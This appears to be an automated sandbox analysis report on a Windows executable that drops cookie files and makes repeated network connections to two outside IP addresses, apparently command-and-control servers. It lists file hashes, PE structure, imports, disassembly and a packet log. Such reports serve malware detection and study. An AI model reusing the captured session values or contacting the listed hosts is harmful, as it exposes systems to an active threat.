SSDEEP:	3:YqkwiIcsGtRzD520UQ2MWc3UMXLBBLRYUULAPvn:CwiIrO2tXM7XLl5mqvn
MD5:	3EFD2B7B7DD27F6B764E701AEAF43DFF
SHA1:	ECB52F1F8BD72D1243A2C446E778AC12D8A0565B
SHA-256:	C996B15B6DE5D7431DBCC6044B7ACDB84014C131D469531938BCB7475293A1C5
SHA-512:	E228A1043649169020698770768420B665FD78773C04E1BDB2C61774FCF4E8117A64ABC9E90E4B72C28AC9BECA65049935013647D7183E9FF939224CC801EFE6
Malicious:	false
Preview:	parking_session.baf82661-e91b-444a-95fc-a8abc3fa4f75.survey-smiles.com/.1536.1039441152.31116513.1724241744.31116512.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\C7GDP0V0.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2B07.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	101
Entropy (8bit):	4.1975931885051265
Encrypted:	false
SSDEEP:	3:pLvj3BTWAoXCMcSGJLIA0jbdZX7vWGTSbQdEQWUULAPvn:N3FW6SGFSNevDUmqvn
MD5:	EE1565ED2DF88042019FF8984A95F12A
SHA1:	039BC727194348C11E67FAA8147402430FF3869F
SHA-256:	C8D1A953554A8BCC8AEB3438EBA4D3DC11D04DD5827164B027B7DF6EE17CA933
SHA-512:	D83275050C76D8B737F942E2CBF1604FA1E4C30E9672B6B98ED08295E7D7054F2EA866D1D63E9F7E48E70F805CF93C4A3584058090F4A0DB7472080E10B849E0
Malicious:	false
Preview:	stel_ssid.d1e222eee8c843edfb_3455152776784339756.t.me/.9729.1000949248.31116712.185854124.31116512.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\FSFIJPYD.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2B07.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.332987472625654
Encrypted:	false
SSDEEP:	3:lTW//WLIwI9BIhorh+eBWCNvhPhCQAPvn:lToUY97I4Nvrqvn
MD5:	D2DF4C7AD5D7DB344633FF6EDBCFAAB3
SHA1:	8B8CF58227296A25DEB662F575B7FF6096055AB6
SHA-256:	B963444E0A28A7B4577E67CBFDD8641534D4F17B2893034EBC7F75754B89C8B0
SHA-512:	3CD246C9F87EEE6EDF0B83981E9D2A870F6D6C7BC2B056F0008634C5D62F8E498FEC63285E0407B1CE88D602B80EDDA44E8CF3F1190DC4940C9F33F2BE7DDB1E
Malicious:	false
Preview:	sid.6305125f-38d2-11ef-a8ad-bd9200aff948.arpdabl.org/.9728.599375744.36116511.1709109969.31116512.*.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.286916556659694
TrID:	Win32 Executable (generic) a (10002005/4) 91.23% Win32 Executable Borland Delphi 7 (665061/41) 6.07% Win32 Executable Borland Delphi 6 (262906/60) 2.40% Win32 Executable Delphi generic (14689/80) 0.13% Windows Screen Saver (13104/52) 0.12%
File name:	82xul16VKj.exe
File size:	1'608'192 bytes
MD5:	eb2f14b68aa11a4aea94985c87714811
SHA1:	2fa340debaa9fbe53ad934403d64a827ddde9445
SHA256:	07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957
SHA512:	c503d02f30c87b3a557314b2d7ad6f90fcaed8f0f7265975813f67f398cc85cbf4690f330736f63641c493cb1e383be6c4d059e33a4c9bfd6ad9ed612af6d942
SSDEEP:	24576:FQH4MilLLfPSJOAc3ErwoD/k9wokidQrlVSP0p+vMiZOVDtplF:m5KL30OA0ONyw5iqpNUONtx
TLSH:	8E75E026BEA18532D21362F94C3B26949C387D502D24E41BFADC2F4E4EE73ED60552B7
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	c1692e1f373f1307

Static PE Info

General

Entrypoint:	0x455008
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9bb8895146d718c20e7648238aa35ab2

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00454D10h
call 00007F6580B1DA05h
mov eax, dword ptr [0045772Ch]
mov eax, dword ptr [eax]
call 00007F6580B6745Dh
mov ecx, dword ptr [00457874h]
mov eax, dword ptr [0045772Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [004546ACh]
call 00007F6580B6745Dh
mov eax, dword ptr [0045772Ch]
mov eax, dword ptr [eax]
call 00007F6580B674D1h
call 00007F6580B1BB28h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x59000	0x1fac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x12a000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5d000	0x66f8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5c000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x54050	0x54200	b8f784e44289a42ef6bb30b4a9671c83	False	0.5270245170876672	data	6.4960464798819855	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x56000	0x1904	0x1a00	746a88ddd285549406ed3603bd368505	False	0.44275841346153844	data	4.423901223624386	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x58000	0xe4d	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x59000	0x1fac	0x2000	52429d80df4cb26cd124aa659794ceda	False	0.369873046875	data	5.013391179853796	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5b000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5c000	0x18	0x200	7bf35113e8d51f0b7aa5e0d4cdb423ca	False	0.048828125	data	0.2005819074398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x5d000	0x66f8	0x6800	746e00abda79f4a657da325856f6646f	False	0.5968299278846154	data	6.637731795985165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x12a000	0x12a000	58640219fcb1b9773466212053a2da05	False	0.7567818660864094	data	7.365288168670157	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x6501c	0x134	data			0.237012987012987
RT_CURSOR	0x65150	0x134	data			0.4642857142857143
RT_CURSOR	0x65284	0x134	data			0.4805194805194805
RT_CURSOR	0x653b8	0x134	data			0.38311688311688313
RT_CURSOR	0x654ec	0x134	data			0.36038961038961037
RT_CURSOR	0x65620	0x134	data			0.4090909090909091
RT_CURSOR	0x65754	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_CURSOR	0x65888	0x134	data			0.21103896103896103
RT_CURSOR	0x659bc	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_BITMAP	0x65af0	0xd8	Device independent bitmap graphic, 14 x 14 x 4, image size 112			0.4027777777777778
RT_BITMAP	0x65bc8	0xd8	Device independent bitmap graphic, 14 x 14 x 4, image size 112			0.4027777777777778
RT_BITMAP	0x65ca0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0x65e70	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0x66054	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0x66224	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0x663f4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0x665c4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0x66794	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0x66964	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0x66b34	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0x66d04	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0x66ed4	0xe0	Device independent bitmap graphic, 15 x 15 x 4, image size 120			0.36160714285714285
RT_BITMAP	0x66fb4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.3103448275862069
RT_BITMAP	0x6709c	0xe0	Device independent bitmap graphic, 15 x 15 x 4, image size 120			0.39732142857142855
RT_BITMAP	0x6717c	0xe0	Device independent bitmap graphic, 15 x 15 x 4, image size 120			0.4330357142857143
RT_BITMAP	0x6725c	0xd8	Device independent bitmap graphic, 14 x 14 x 4, image size 112			0.39814814814814814
RT_BITMAP	0x67334	0xd8	Device independent bitmap graphic, 14 x 14 x 4, image size 112			0.3888888888888889
RT_BITMAP	0x6740c	0x84	Device independent bitmap graphic, 7 x 7 x 4, image size 28			0.5681818181818182
RT_BITMAP	0x67490	0x84	Device independent bitmap graphic, 7 x 7 x 4, image size 28			0.5681818181818182
RT_BITMAP	0x67514	0xe0	Device independent bitmap graphic, 15 x 15 x 4, image size 120			0.45089285714285715
RT_BITMAP	0x675f4	0xe0	Device independent bitmap graphic, 15 x 15 x 4, image size 120, resolution 3780 x 3780 px/m			0.53125
RT_BITMAP	0x676d4	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_BITMAP	0x677bc	0xe0	Device independent bitmap graphic, 15 x 15 x 4, image size 120			0.4375
RT_BITMAP	0x6789c	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.34051724137931033
RT_ICON	0x67984	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.5013440860215054
RT_ICON	0x67c6c	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.311841949603691
RT_DIALOG	0x78494	0x52	data			0.7682926829268293
RT_STRING	0x784e8	0x244	data			0.4379310344827586
RT_STRING	0x7872c	0x3c4	data			0.33713692946058094
RT_STRING	0x78af0	0x2c4	data			0.4392655367231638
RT_STRING	0x78db4	0x288	data			0.4567901234567901
RT_STRING	0x7903c	0x1ec	data			0.3516260162601626
RT_STRING	0x79228	0x148	data			0.5548780487804879
RT_STRING	0x79370	0x274	data			0.44904458598726116
RT_STRING	0x795e4	0x178	data			0.5585106382978723
RT_STRING	0x7975c	0xe8	data			0.5991379310344828
RT_STRING	0x79844	0x154	data			0.5441176470588235
RT_STRING	0x79998	0x498	data			0.37755102040816324
RT_STRING	0x79e30	0x354	data			0.3908450704225352
RT_STRING	0x7a184	0x3e8	data			0.33
RT_STRING	0x7a56c	0x234	data			0.475177304964539
RT_STRING	0x7a7a0	0xec	data			0.5508474576271186
RT_STRING	0x7a88c	0x1b4	data			0.5206422018348624
RT_STRING	0x7aa40	0x3e4	data			0.32028112449799195
RT_STRING	0x7ae24	0x358	data			0.4158878504672897
RT_STRING	0x7b17c	0x2b4	data			0.4060693641618497
RT_RCDATA	0x7b430	0x10	data			1.5
RT_RCDATA	0x7b440	0x112334	data	English	United States	0.8041696548461914
RT_RCDATA	0x18d774	0x46c	data			0.6607773851590106
RT_RCDATA	0x18dbe0	0x21b	Delphi compiled form 'Tplfb'			0.62152133580705
RT_GROUP_CURSOR	0x18ddfc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x18de10	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x18de24	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x18de38	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x18de4c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x18de60	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x18de74	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x18de88	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x18de9c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x18deb0	0x14	data	English	United States	1.2
RT_GROUP_ICON	0x18dec4	0x14	data	English	United States	1.25

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalMemoryStatus, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStretchBltMode, GetStockObject, GetPixel, GetPaletteEntries, GetObjectType, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 02:22:19.394881010 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:19.394923925 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:19.395001888 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:19.404840946 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:19.404863119 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.023930073 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.024126053 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.029237986 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.029253960 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.029494047 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.029546976 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.090017080 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.136495113 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.290682077 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.290719032 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.290730953 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.290745974 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.290757895 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.290771961 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.290797949 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.290802956 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.290843964 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.297883987 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.298319101 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.298327923 CEST	443	49161	149.154.167.99	192.168.2.22
Jul 3, 2024 02:22:20.298357010 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.298388958 CEST	49161	443	192.168.2.22	149.154.167.99
Jul 3, 2024 02:22:20.321471930 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:20.326558113 CEST	5432	49162	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:20.326725006 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:20.327032089 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:20.332139969 CEST	5432	49162	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:21.046699047 CEST	5432	49162	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:21.046749115 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:21.047014952 CEST	5432	49162	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:21.047049999 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:21.060034990 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:21.065090895 CEST	5432	49162	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:21.258761883 CEST	5432	49162	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:21.258824110 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:22.661619902 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:22.666472912 CEST	5432	49162	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:23.129015923 CEST	5432	49162	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:23.129132032 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:23.132035017 CEST	49164	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:23.136910915 CEST	5432	49164	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:23.136989117 CEST	49164	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:23.137300014 CEST	49164	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:23.142102003 CEST	5432	49164	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:23.815804005 CEST	5432	49164	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:23.819911957 CEST	49164	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:23.830684900 CEST	49164	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:23.834450006 CEST	49164	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:23.835601091 CEST	5432	49164	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:23.839385986 CEST	5432	49164	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:24.478014946 CEST	5432	49164	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:24.478229046 CEST	49164	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:24.480384111 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:24.485543013 CEST	5432	49162	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:24.485599995 CEST	49162	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:24.497312069 CEST	49165	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:24.502118111 CEST	5432	49165	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:24.502207994 CEST	49165	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:24.502475023 CEST	49165	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:24.507241011 CEST	5432	49165	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:25.157833099 CEST	5432	49165	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:25.157944918 CEST	49165	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:25.158782959 CEST	49165	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:25.160373926 CEST	49165	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:25.163614035 CEST	5432	49165	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:25.165150881 CEST	5432	49165	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:25.818648100 CEST	5432	49165	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:25.818660975 CEST	5432	49165	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:25.818837881 CEST	49165	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:25.819789886 CEST	49164	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:25.820115089 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:25.824911118 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:25.824966908 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:25.824991941 CEST	5432	49164	116.202.180.70	192.168.2.22
